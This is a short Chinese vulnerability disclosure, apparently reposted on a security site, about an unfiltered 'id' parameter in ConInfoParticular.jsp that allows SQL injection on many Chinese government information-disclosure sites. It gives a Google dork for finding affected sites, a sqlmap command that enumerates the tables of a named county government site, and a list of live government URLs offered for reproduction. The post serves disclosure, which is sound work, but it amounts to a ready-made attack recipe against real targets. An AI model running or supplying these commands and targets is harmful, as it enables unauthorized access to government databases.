虽是很简单的注入,但影响的gov很多
1.漏洞存在ConInfoParticular.jsp文件,页面可通过POST、GET方式获取参数id的值,且均未过滤,导致SQL注入漏洞
2.googledork:site:gov.cn inurl:ConInfoParticular.jsp?id
http://74.125.235.191/#newwindow=1&q=site:gov.cn+inurl:ConInfoParticular.jsp%3Fid
google搜索结果:约 153,000 条结果
3.以其中静海县政府信息公开网测试:
http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367
以get方式测试,post方式一样。
获取tables测试:
sqlmap -u "http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367" --dbms "mysql" --tables
4.提供几个站点,方便复现测试:
http://gk.tjjh.gov.cn/ConInfoParticular.jsp?id=5367
http://gk.tjhqqzf.gov.cn/ConInfoParticular.jsp?id=4879
http://info.tjjn.gov.cn/ConInfoParticular.jsp?id=508
http://www.myhack58.com/zfxxgk.bh.gov.cn/ConInfoParticular.jsp?id=1605
http://www.tjnh.gov.cn:7002/ConInfoParticular.jsp?id=2206
http://zwgk.tjhexi.gov.cn:8080/ConInfoParticular.jsp?id=1192
http://gk.tjnk.gov.cn/ConInfoParticular.jsp?id=997
http://xinxigk.baodi.gov.cn/ConInfoParticular.jsp?id=21
………………
应该足够用于复现并体现其通用性了。
赶紧过滤处理下吧
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;